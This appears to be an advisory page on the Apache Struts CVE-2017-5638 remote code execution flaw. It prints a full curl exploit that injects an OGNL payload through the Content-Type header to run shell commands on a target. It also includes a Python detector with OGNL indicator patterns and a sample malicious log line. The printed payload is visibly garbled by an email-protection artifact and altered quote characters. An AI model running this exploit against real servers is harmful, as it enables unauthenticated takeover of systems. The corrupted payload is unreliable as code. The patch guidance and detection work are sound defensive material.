Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

The CVE-2017-5638 vulnerability in Apache Struts is a critical remote code execution flaw stemming from flawed error handling in the Jakarta Multipart parser. The exploit works by sending a maliciously crafted `Content-Type` HTTP header to a server using the vulnerable Struts library. When the framework attempts to process an invalid or malformed file upload request, it incorrectly passes the unvalidated `Content-Type` value to the underlying Object-Graph Navigation Language (OGNL) interpreter while building the error message. This allows an attacker to inject and execute arbitrary OGNL expressions. Since OGNL expressions can call Java methods and execute system commands with the same privileges as the Struts application server, this vulnerability provides a direct path for unauthenticated attackers to achieve full remote command execution on the target system. The attack is particularly dangerous because it does not require a valid file upload or any form of user authentication, making it easy to weaponize.
Platform: Apache Struts

Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability: Remote Code Execution

Severity: Critical

Date: 2017-03-07

Prediction: Patched 2017-03-07

What Undercode Says:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/struts2-showcase/fileupload/doUpload.action`

How the Exploit Works:

Malicious Content-Type header injection.

OGNL expression execution.

Arbitrary system command execution.

Protection from this CVE:

Apply vendor patch immediately.

Upgrade to Struts 2.3.32 or 2.5.10.1.

WAF filtering for malicious headers.
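The two actionable items above (upgrade to a fixed release, and filter malicious `Content-Type` headers) can both be checked in code. The following Python script is an added example written for this page; it is not part of the original advisory, the Struts project, or any WAF product. It assumes a simplified, constructed log format with a `ct="..."` field holding the request's `Content-Type`, and the affected version ranges are taken from the advisory header above. Rather than matching only known payload strings, the header check first asks whether the value even parses as a `type/subtype; param=value` media type, then adds a few OGNL-specific indicators for triage context.

```python
"""Defensive checks for CVE-2017-5638 (added example, not project code)."""
import re
from typing import Dict, List, Tuple

# Affected ranges from the advisory: 2.3.5 - 2.3.31 and 2.5 - 2.5.10.
# Fixed releases are 2.3.32 and 2.5.10.1.
AFFECTED_RANGES: Tuple[Tuple[str, str], ...] = (("2.3.5", "2.3.31"), ("2.5", "2.5.10"))


def _normalize(version: str) -> Tuple[int, ...]:
    """Turn '2.5' into (2, 5, 0, 0) so tuple comparison works across depths."""
    parts = tuple(int(p) for p in version.strip().split("."))
    return parts + (0,) * (4 - len(parts))


def is_affected(version: str) -> bool:
    """True if a Struts version string falls inside an affected range."""
    v = _normalize(version)
    return any(_normalize(lo) <= v <= _normalize(hi) for lo, hi in AFFECTED_RANGES)


# A legitimate Content-Type is "type/subtype" followed by optional ";name=value"
# parameters. Anything that does not fit this grammar is suspicious on its own.
MEDIA_TYPE_RE = re.compile(
    r'^[\w.+-]+/[\w.+-]+'                              # e.g. multipart/form-data
    r'(?:\s*;\s*[\w-]+=(?:"[^"]*"|[^;"\s]+))*\s*$'     # e.g. ; boundary=abc
)

# OGNL indicators used for triage context (illustrative, not exhaustive).
OGNL_INDICATORS: Dict[str, "re.Pattern[str]"] = {
    "expression_open": re.compile(r"[%$]\{"),                  # %{ ... } / ${ ... }
    "static_call": re.compile(r"@[A-Za-z_][\w.]*@\w+"),         # @pkg.Class@method
    "member_access": re.compile(r"_memberAccess|DEFAULT_MEMBER_ACCESS", re.I),
    "process_exec": re.compile(r"ProcessBuilder|getRuntime\s*\(|\.exec\s*\("),
}


def scan_content_type(value: str) -> List[str]:
    """Return the list of indicator names triggered by a Content-Type value."""
    hits = [name for name, rx in OGNL_INDICATORS.items() if rx.search(value)]
    if not MEDIA_TYPE_RE.match(value):
        hits.append("malformed_media_type")
    return hits


# Constructed log format: <timestamp> <client-ip> <method> <path> ct="<content-type>"
LOG_RE = re.compile(r'^(?P<ts>\S+) (?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) ct="(?P<ct>.*)"$')


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per log line whose Content-Type trips any indicator."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        hits = scan_content_type(m.group("ct"))
        if hits:
            findings.append({"ip": m.group("ip"), "path": m.group("path"), "indicators": hits})
    return findings


# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '2017-03-08T10:15:02Z 203.0.113.5 POST /struts2-showcase/fileupload/doUpload.action '
    'ct="multipart/form-data; boundary=----FormBoundaryAbc123"',
    '2017-03-08T10:15:09Z 203.0.113.7 POST /struts2-showcase/fileupload/doUpload.action '
    'ct="application/x-www-form-urlencoded"',
    '2017-03-08T10:16:41Z 198.51.100.23 POST /struts2-showcase/fileupload/doUpload.action '
    "ct=\"%{(#_='multipart/form-data').(#x=@java.lang.System@getProperty('os.name'))}\"",
]


if __name__ == "__main__":
    for v in ("2.3.31", "2.3.32", "2.5.10", "2.5.10.1"):
        print(f"Struts {v}: {'AFFECTED' if is_affected(v) else 'not affected'}")
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} -> {f['path']} indicators={f['indicators']}")
```

The grammar check is the part worth keeping: signature lists go stale as payloads are re-encoded, but a `Content-Type` that is not a media type at all never has a legitimate reason to reach the multipart parser, so rejecting it at the edge is a stable control while the upgrade is rolled out. `is_affected` only understands numeric dotted versions; a suffix such as `-SNAPSHOT` raises `ValueError` and should be handled by the caller.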

Impact:

Full system compromise.

Data breach and theft.

Complete application control.

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
